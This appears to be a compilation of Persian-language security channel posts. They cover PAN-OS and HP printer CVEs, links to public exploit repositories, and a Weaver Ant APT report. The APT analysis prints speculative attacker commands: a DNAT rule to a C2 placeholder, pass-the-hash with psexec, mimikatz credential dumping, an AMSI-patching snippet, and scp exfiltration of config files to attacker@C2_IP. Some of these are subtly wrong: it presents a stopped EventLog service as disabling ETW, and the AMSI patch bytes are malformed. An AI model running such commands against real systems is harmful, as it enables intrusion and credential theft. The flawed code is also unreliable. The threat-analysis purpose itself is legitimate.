شرکت Palo Alto Networks بار دیگر با مشکلاتی در سیستم عامل PAN-OS مواجه شده است. این شرکت در روز چهارشنبه ۱۰ توصیه جدید امنیتی منتشر کرد و مشتریان خود را از وجود آسیب‌پذیری‌های جدید و تأثیر آسیب‌پذیری‌های قبلی بر محصولاتش، از جمله یک آسیب‌پذیری جدی احتمالی مربوط به دور زدن احراز هویت در فایروال‌ها، مطلع کرد.

مهم‌ترین این آسیب‌پذیری‌ها با شناسه CVE-2025-0108 توصیف شده است. این مشکل در PAN-OS به مهاجمان غیرمجاز که دسترسی شبکه‌ای به رابط مدیریت فایروال هدف دارند، اجازه می‌دهد تا احراز هویت را دور زده و اسکریپت‌های PHP خاصی را فراخوانی کنند. Palo Alto Networks توضیح می‌دهد که فراخوانی این اسکریپت‌های PHP منجر به اجرای کد از راه دور نمی‌شود، اما ممکن است بر یکپارچگی و محرمانگی سیستم عامل PAN-OS تأثیر منفی بگذارد.

این شرکت برای نسخه‌های آسیب‌پذیر PAN-OS پچ هایی منتشر کرده است و همچنین راه‌حل‌های موقت و اقدامات کاهش‌دهنده‌ای را ارائه داده است. آنها تأکید کرده‌اند که اگر دسترسی به رابط مدیریت فقط به آدرس‌های IP داخلی مورد اعتماد محدود شود، شدت این آسیب‌پذیری به میزان قابل توجهی کاهش می‌یابد.

Palo Alto
به این مشکل سطح شدت بالایی (با امتیاز CVSS 7.8) اختصاص داده است، اما هیچ شواهدی از سوءاستفاده عملی از این آسیب‌پذیری گزارش نشده است. با این حال، محققان شرکت Assetnote که این آسیب‌پذیری را در حین بررسی دو آسیب‌پذیری دیگر فایروال‌های Palo Alto کشف کردند، آن را به عنوان یک آسیب‌پذیری بحرانی طبقه‌بندی کرده‌اند. آنها معتقدند که این آسیب‌پذیری در ترکیب با یک مشکل دیگر در PAN-OS می‌تواند منجر به اجرای کد از راه دور (RCE) شود.

شرکت Searchlight Cyber که اخیراً Assetnote را خریداری کرده است، نیز در روز چهارشنبه جزئیات فنی این آسیب‌پذیری در PAN-OS را منتشر کرد.

علاوه بر این، Palo Alto Networks از رفع یک مشکل دیگر در PAN-OS با شناسه CVE-2025-0110 خبر داده است. این مشکل نیز سطح شدت بالایی دارد و مربوط به تزریق دستور است، اما برای سوءاستفاده از آن نیاز به دسترسی administrator است.

همچنین توصیه‌هایی برای مشکلات با سطح شدت متوسط در عامل Cortex XDR (که امکان غیرفعال کردن عامل را می‌دهد) و Cortex XDR Broker (دسترسی غیرمجاز) و همچنین سایر مشکلات PAN-OS (خواندن و حذف فایل‌ها) منتشر شده است.

بر اساس گزارش Palo Alto Networks، هیچ یک از آسیب‌پذیری‌های ذکر شده در این بسته توصیه‌های امنیتی، از جمله مشکلات PAN-OS، در شرایط واقعی مورد سوءاستفاده قرار نگرفته‌اند.

@PfkSecurity

Exploit Development: Investigating Kernel Mode Shadow Stacks on Windows
https://connormcgarr.github.io/km-shadow-stacks

CVE-2025-26506
یک آسیب‌پذیری امنیتی است که در پرینترهای HP LaserJet Pro با قابلیت PostScript شناسایی شده است. این آسیب‌پذیری به دلیل وجود یک stack-based buffer overflow در پردازش کارهای چاپی PostScript ایجاد می‌شود. این نوع آسیب‌پذیری می‌تواند به مهاجمان اجازه دهد کدهای مخرب را اجرا کنند، کنترل دستگاه را به دست بگیرند یا باعث اختلال در عملکرد سیستم شوند.
توضیح آسیب‌پذیری:

- Stack-based buffer overflow:
این نوع آسیب‌پذیری زمانی رخ می‌دهد که داده‌های ورودی بیش از حد مجاز در بافر (ناحیه‌ای از حافظه) نوشته می‌شوند و باعث سرریز شدن به بخش‌های دیگر حافظه می‌گردند. در این حالت، مهاجم می‌تواند با ارسال داده‌های خاص، کنترل برنامه را به دست بگیرد.
- محل وقوع: این آسیب‌پذیری در پردازش فایل‌های PostScript در پرینترهای HP LaserJet Pro رخ می‌دهد.

راهکارهای امنیتی:
1. به‌روزرسانی فریم‌ور: HP معمولاً پس از شناسایی چنین آسیب‌پذیری‌هایی، به‌روزرسانی‌های امنیتی را منتشر می‌کند. کاربران باید آخرین نسخه‌ی فریم‌ور پرینتر خود را از وب‌سایت رسمی HP دانلود و نصب کنند.
2. محدود کردن دسترسی: دسترسی به پرینتر را تنها به کاربران و دستگاه‌های مورد اعتماد محدود کنید. از شبکه‌های امن و VLAN برای جداسازی پرینترها استفاده نمایید.
3. فیلتر کردن ترافیک شبکه: از فایروال‌ها یا سیستم‌های امنیتی شبکه برای فیلتر کردن ترافیک غیرضروری به سمت پرینتر استفاده کنید.
4. غیرفعال کردن قابلیت‌های غیرضروری: اگر نیازی به قابلیت PostScript ندارید، آن را در تنظیمات پرینتر غیرفعال کنید.

مراحل بهره‌برداری از این آسیب‌پذیری (برای اهداف آموزشی):
1. شناسایی دستگاه‌های آسیب‌پذیر: مهاجم ابتدا پرینترهای HP LaserJet Pro با قابلیت PostScript را در شبکه شناسایی می‌کند.
2. ارسال کار چاپی مخرب: مهاجم یک فایل PostScript مخرب ایجاد می‌کند که حاوی کدهای خاص برای ایجاد سرریز بافر است.
3. اجرای کد مخرب: اگر پرینتر آسیب‌پذیر باشد، کد مخرب اجرا شده و مهاجم می‌تواند کنترل دستگاه را به دست بگیرد یا باعث اختلال در عملکرد آن شود.

نکته مهم:

اگر از پرینترهای HP LaserJet Pro استفاده می‌کنید، حتماً وضعیت به‌روزرسانی فریم‌ور دستگاه خود را بررسی کنید و در صورت وجود وصله‌های امنیتی، آن‌ها را نصب نمایید.

@Pfksecurity

مجموعه ای از بیش از 500 ویدیو از 20 رویداد امنیتی فناوری اطلاعات

https://sectube.tv/

@Pfksecurity

🔍 کاوش NTDS.dit

این پست وبلاگ ساختار فایل NTDS.dit را بررسی می کند که داده ها را برای Active Directory ذخیره می کند. همچنین DIT Explorer را معرفی می کند، یک ابزار منبع باز جدید که برای تجزیه و تحلیل NTDS.dit طراحی شده است، و نشان می دهد که چگونه پایگاه داده را برای ارائه یک نمای ساختاریافته از دایرکتوری تفسیر می کند.

🔗 تحقیق:
https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer

🔗 منبع:
https://github.com/trustedsec/DitExplorer

#ad #windows #ntds #dnt
@PfkSecurity

مقدمه ای بر eBPF برای ویندوز

https://scorpiosoftware.net/2025/02/22/introduction-to-ebpf-for-windows/

@PfkSecurity

در این جلسه، تمرکز بر روی تاکتیک‌های تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره می‌شود که دستگاه‌های روزمره مانند توسترها و توالت‌ها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمی‌شوند. سخنران که یک تحلیل‌گر امنیتی در Black Hills Information Security است، بر اهمیت یادگیری و آموزش تکنیک‌های هک تأکید می‌کند.
توضیحات این ویدئو ادامه دارد در پایین بخوانید .
#RedTeam
@PfkSecurity

ابزارهایی مانند USB rubber duckies و LAN turtles به عنوان وسایلی برای گسترش قابلیت‌های تیم قرمز معرفی می‌شوند. Hack5 به عنوان یک سازمان کلیدی در تولید دستگاه‌های سخت‌افزاری برای تست نفوذ و تیم قرمز ذکر می‌شود. دو نوع اصلی حمله با استفاده از این دستگاه‌ها شناسایی می‌شود: حملات فرصت‌طلبانه و حملات دسترسی از راه دور.

سخنران به چالش‌های جمع‌آوری داده و خروج اطلاعات در سازمان‌های بزرگ با نظارت شبکه‌ای سختگیرانه اشاره می‌کند. همچنین، تکنولوژی‌های بی‌سیم مانند بلوتوث و Wi-Fi به عنوان روش‌های ممکن برای خروج داده‌ها مورد بحث قرار می‌گیرند، اما در محیط‌های امن ممکن است با چالش‌هایی مواجه شوند.

در ادامه، به تکنولوژی LoRa اشاره می‌شود که به دلیل مصرف کم انرژی و قابلیت‌های برد بلند، برای دستگاه‌های IoT مناسب است. همچنین، محدودیت‌هایی مانند اندازه حداکثر بسته ۲۵۵ بایتی LoRa نیز مطرح می‌شود. سخنران تجربیات خود را در طراحی مدارهای چاپی برای کنترل یک ماهواره شبیه‌سازی شده با استفاده از تکنولوژی LoRa به اشتراک می‌گذارد.

در بخش‌های بعدی، یک حمله USB rubber ducky به نمایش گذاشته می‌شود که شامل تزریق کلیدها برای باز کردن یک پست وبلاگ است. همچنین، استفاده از Raspberry Pi Zero با یک برد LoRaPi برای ارتباطات بی‌سیم و قابلیت‌های مختلف مورد بحث قرار می‌گیرد.

در نهایت، توصیه‌هایی برای جلوگیری از حملات فیزیکی و نظارت بر ترافیک شبکه ارائه می‌شود. تأکید بر اهمیت امنیت فیزیکی و انجام بازرسی‌های منظم برای شناسایی دستگاه‌های غیرمجاز نیز مطرح می‌شود. در کل، این جلسه به بررسی چالش‌ها و فرصت‌های موجود در زمینه امنیت IoT و تاکتیک‌های تیم قرمز می‌پردازد.

@Pfksecurity

بسته‌های Typosquatted Go Loader بدافزار را ارائه می‌کند که سیستم‌های لینوکس و macOS را هدف قرار می‌دهد

https://socket.dev/blog/typosquatted-go-packages-deliver-malware-loader

تجزیه و تحلیل بدافزار Stealc با باینری نینجا (جریان - 2025/02/25)

https://www.youtube.com/watch?v=zqVOhIK1cM8

نوروز سال ۲۵۸۴ پیروز

مراقب باش و هیچ نمونه‌ای را روی دستگاه اصلی خود اجرا نکن. آخرین چیزی که می‌خواهم این است که آسیبی به هیچ کامپیوتری وارد نشود. این موضوع ارتباطی با باج‌افزار Cryakl ندارد.

https://github.com/Cryakl
@PfkSecurity

Jasmin Ransomware - SQL Injection Login Bypass

https://www.exploit-db.com/exploits/52091

توضیحات :
 این مربوط به یک حفره امنیتی خطرناک در سیستم‌هایی است که از Jasmin Ransomware استفاده می‌کنند. این اکسپلویت به هکرها اجازه می‌دهد با دستکاری لاگین (SQL Injection)، بدون پسورد وارد سیستم قربانی شوند .

#exploit #poc #sql
@PfkSecurity

Totolink Router RCE
https://github.com/imnotaracistguys/Totolink-Router


این مربوط به یک حفره امنیتی خطرناک (RCE) در روترهای Totolink است که اجازه میدهد هکرها از راه دور کدهای مخرب اجرا کنند و کنترل کامل دستگاه را بگیرند

#github #exploit #IoT
@Pfksecurity

CVE-2025-1974 exploit

https://github.com/sandumjacob/IngressNightmare-POCs

یک حفره امنیتی خطرناک (CVE-2025-1974) با نام Ingress Nightmare است که اجازه میدهد هکرها از طریق یک آسیب‌پذیری در سیستم‌های هدف، دسترسی غیرمجاز بگیرند یا کنترل سیستم را در دست بگیرند!

@PfkSecurity

چینی APT گروه Weaver Ant بیش از چهار سال در شبکه یک ارائه دهنده خدمات ارتباطی فعالیت میکرد و با استفاده از روترهای Zyxel CPE که به خطر افتاده بودند، ترافیک و زیرساخت خود را پنهان میکرد.

محققان شرکت Sygnia توانستند رد این هکرها را پیدا کنند و چندین نسخه از بکدور China Chopper و یک شل وب سفارشی قبلاً ناشناخته به نام INMemory را کشف کردند که پیلودهای مفید را در حافظه میزبان اجرا میکند.

به گفته محققان، پس از آنکه مهاجم یک اپراتور بزرگ مخابراتی آسیایی را هدف قرار داد، ریشه کن کردن حضور آن به رغم تلاشهای متعدد برای خنثی سازی فعالیتهایش، کار بسیار دشواری بود.

Weaver Ant
برای نفوذ خود از شبکهای از بلوک های رله عملیاتی (ORB) استفاده کرد که عمدتاً شامل روترهای Zyxel CPE بودند و این امکان را فراهم میکرد تا ترافیک را پروکسی کرده و زیرساخت خود را پنهان نگه دارد.

مهاجم با استفاده از یک نسخه رمزگذاری شده با AES از شل وب China Chopper در شبکه مستقر شد که امکان مدیریت از راه دور سرور ها را فراهم میکرد و محدودیت های فایروال را دور میزد.

با پیشرفت عملیات، Weaver Ant به یک شل وب پیشرفته تر و سفارشی به نام INMemory روی آورد که از یک فایل DLL (eval.dll) برای اجرای پنهانی کد «Just-in-Time» (JIT) استفاده میکرد.

همانطور که Sygnia اشاره کرده، روشهای استخراج داده ها نیز توسط این APT به گونه ای انتخاب شده بود که کمترین شک را برانگیزد، از جمله ضبط غیرفعال ترافیک شبکه با استفاده از mirroring پورت.

به جای استقرار جداگانه وب شل ها، گروه Weaver Ant آنها را از طریق تکنیک "تونل زنی وب شل ها" به هم مرتبط کرد - روشی که پیشتر در حملات گروه مالی Elephant Beetle مشاهده شده بود.

این روش شامل انتقال ترافیک HTTP از یک سرور به سرور دیگر از طریق بخش های مختلف شبکه است که در واقع یک شبکه C2 پنهان درون زیرساخت قربانی ایجاد میکند.

هر وب شل به عنوان یک پروکسی عمل کرده و پیلود های تو در تو و رمزنگاری شده را به وب شل های دیگر منتقل میکند تا به صورت مرحله ای درون شبکه اجرا شوند.

این رویکرد به Weaver Ant اجازه میداد روی سرورهای بخش های مختلف شبکه فعالیت کند.

بیشتر این سرورها، سیستم های داخلی بدون اتصال به اینترنت بودند که از طریق سرورهای دارای دسترسی اینترنتی (به عنوان دروازههای عملیاتی) قابل دسترسی میشدند.

یافته های Sygnia نشان میدهد Weaver Ant به صورت افقی در شبکه حرکت میکرد و از منابع اشتراکی SMB و حساب های دارای دسترسی بالا استفاده میکرد که سالها با یک رمز عبور ثابت (اغلب با هش NTLM) کار میکردند.

در طول چهار سال جاسوسی سایبری، هکرها فایل های پیکربندی، لاگ های دسترسی و اعتبارنامه ها را سرقت کردند تا محیط را نقشه برداری و سیستمهای ارزشمند را شناسایی کنند.

آنها مکانیسم های ثبت رویداد را غیرفعال میکردند، از جمله اصلاح ETW (ردیابی رویدادهای ویندوز) و دور زدن AMSI (با بازنویسی تابع AmsiScanBuffer در ماژول amsi.dll) تا حجم بدافزار را کاهش داده و مدت طولانی تری بدون شناسایی بمانند.

محققان Weaver Ant را یک APT حرفه ای و باتجربه میدانند که قادر به حفظ دسترسی بلندمدت به شبکه قربانی برای عملیات جاسوسی سایبری است.

این انتساب بر اساس استفاده از روترهای Zyxel (که در برخی مناطق جغرافیایی محبوب هستند)، بکدورهای مرتبط با گروههای چینی و ساعات فعالیت گروه (مطابق با ساعت گرینویچ +8) انجام شده است.

به نظر میرسد تمرکز مهاجمان بیشتر بر شناسایی شبکه، جمعآوری اعتبارنامه ها و حفظ دسترسی پایدار به زیرساختهای مخابراتی بوده تا سرقت دادههای کاربری یا مالی.

@PfkSecurity

تحلیل حمله APT گروه Weaver Ant:

1. روش‌های نفوذ و تداوم حضور (TTPs):

    الف. استفاده از روترهای Zyxel CPE به‌عنوان نقاط رله (ORB):

        دستورهای احتمالی مهاجم:

        bash

        # تغییر تنظیمات روتر برای ایجاد پروکسی مخفی
        iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <C2_IP>:80

        هدف: مخفی کردن ترافیک C2 در ترافیک عادی شبکه.

    ب. استقرار وب‌شل‌های چندلایه (China Chopper + INMemory):

        دستورهای احتمالی:

        powershell
        # اجرای پیلود در حافظه (JIT) با استفاده از PowerShell
        Invoke-ReflectivePEInjection -DLLPath eval.dll -FunctionName "MaliciousEntry"

        هدف: فرار از تشخیص آنتی‌ویروس با عدم ذخیره فایل روی دیسک.

    ج. تونل‌زنی وب‌شل‌ها (Shell Tunneling):

        دستورهای احتمالی:

        bash
        # انتقال ترافیک از طریق وب‌شل‌های زنجیره‌ای
        curl -X POST -H "Cookie: SessionID=Hacked" --data "payload=<encrypted>" https://InternalServer/transfer

        هدف: ایجاد ارتباط پنهان بین سرورهای داخلی.

2. حرکت جانبی (Lateral Movement):

    الف. سوءاستفاده از SMB و NTLM هش:

        دستورهای احتمالی:

        bash
        # استفاده از Pass-the-Hash برای دسترسی به سیستم‌های دیگر
        psexec.py -hashes :<NTLM_Hash> [email protected]

        هدف: گسترش دسترسی بدون نیاز به رمز عبور .

    ب. استفاده از حساب‌های با دسترسی بالا:

        دستورهای احتمالی:

        powershell
        # جستجوی حساب‌های مدیر سیستم
        Get-WmiObject -Class Win32_UserAccount | Where-Object {$_.SID -like "S-1-5-21-*500"}

        هدف: افزایش دسترسی ها برای دسترسی به داده‌های حساس.

3. جمع‌آوری داده‌ها و فرار از تشخیص:

    الف. غیرفعال کردن ETW و AMSI:

        دستورهای احتمالی:

        powershell

        # توقف سرویس ETW
        Stop-Service -Name "EventLog" -Force
        # بازنویسی تابع AMSI
        [IntPtr]$amsiScanBufferAddr = Get-ProcAddress (Get-Module amsi.dll) "AmsiScanBuffer"
        $patch = [Byte[]] (0xC3, 0x80, 0x07, 0x00)
        [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $amsiScanBufferAddr, 4)

        هدف: جلوگیری از ثبت فعالیت‌های مخرب.

    ب. سرقت فایل‌های پیکربندی و اعتبارنامه‌ها:

        دستورهای احتمالی:

        bash

        # کپی کردن فایل‌های تنظیمات شبکه
        scp /etc/network/interfaces attacker@C2_IP:/stolen_data
        # استخراج اعتبارنامه‌ها از حافظه
        mimikatz.exe "sekurlsa::logonpasswords" "exit"

        هدف: نقشه‌برداری از شبکه و دسترسی به سیستم‌های کلیدی.

4. روش‌های عملی برای دفاع (Mitigation):

    الف. نظارت بر روترهای Zyxel CPE:

        بررسی لاگ‌های دسترسی غیرعادی به پورت‌های مدیریتی.

        به‌روزرسانی فریم‌ور روترها برای رفع آسیب‌پذیری‌ها.

    ب. محدود کردن دسترسی SMB و NTLM:

        فعال‌سازی احراز هویت چندعاملی (MFA) برای حساب‌های حساس.

        غیرفعال کردن NTLM و استفاده از Kerberos.

    ج. نظارت بر فعالیت‌های غیرعادی در حافظه:

        استفاده از ابزارهایی مانند Sysmon برای ردیابی تزریق کد (Code Injection).

        مانیتورینگ فراخوانی توابع eval.dll یا ماژول‌های ناشناخته.

    د. جداسازی شبکه (Network Segmentation):

        محدود کردن ارتباط بین سرورهای داخلی و اینترنت با فایروال.

        استفاده از میکروسگمنتیشن برای کنترل ترافیک شرکتی.

نتیجه‌گیری:

    Weaver Ant
یک APT پیشرفته با تمرکز بر جاسوسی بلندمدت است که از تکنیک‌های زیر استفاده می‌کند:

        پنهان‌سازی ترافیک در دستگاه‌های شبکه (روترهای Zyxel).

        اجرای کد در حافظه (JIT) برای فرار از تشخیص.

        حرکت جانبی با سوءاستفاده از اعتبارنامه‌های ضعیف.

    راهکار دفاعی: ترکیبی از نظارت پیشرفته (EDR/XDR)، حذف اعتبارنامه‌های قدیمی، و به‌روزرسانی مداوم سیستم‌ها.

@PfkSecurity

https://github.com/xforcered/ForsHops


 یک ابزار اثبات مفهوم (PoC) برای حرکت جانبی (Lateral Movement) بدون فایل است که از COM Objects به Trapped در سیستم‌های ویندوزی سوءاستفاده می‌کند. این روش به مهاجمان اجازه می‌دهد بدون نیاز به نوشتن فایل روی دیسک، در شبکه پخش شوند و کنترل سیستم‌های دیگر را به دست آورند .

تکنیک‌های کلیدی که بهش میشه اشاره کرد :
Fileless Execution (اجرای بدون فایل):

کد مخرب مستقیماً در حافظه (RAM) اجرا می‌شود.

از COM Objects مانند MMC20.Application برای اجرای دستورات استفاده می‌کند.

Lateral Movement (حرکت جانبی):

با استفاده از WMI یا DCOM، حمله به سیستم‌های دیگر در همان شبکه انجام می‌شود.
نیازی به دانلود فایل اجرایی روی سیستم قربانی ندارد.

پنهان‌کاری (Stealth):
از آنجایی که فایلی روی دیسک نوشته نمی‌شود، آنتی‌ویروس‌های سنتی آن را تشخیص نمی‌دهند.

لاگ‌های امنیتی کمتری تولید می‌کند.

 چرا ForsHops خطرناک است؟
✅ مقاوم در برابر تشخیص (Evasion):
از آنتی‌ویروس و EDRها فرار می‌کند.
✅ نیاز به دسترسی اولیه کم:
فقط نیاز به یک حساب کاربری با دسترسی محلی/دامنه دارد.
✅ قابلیت گسترش سریع در شبکه:
می‌تواند در چند ثانیه به سیستم‌های دیگر منتقل شود.

🚨 هشدار: این ابزار صرفاً برای آزمایشات امنیتی و تحقیقاتی است. استفاده غیرقانونی از آن پیگرد قانونی دارد!
@PfkSecurity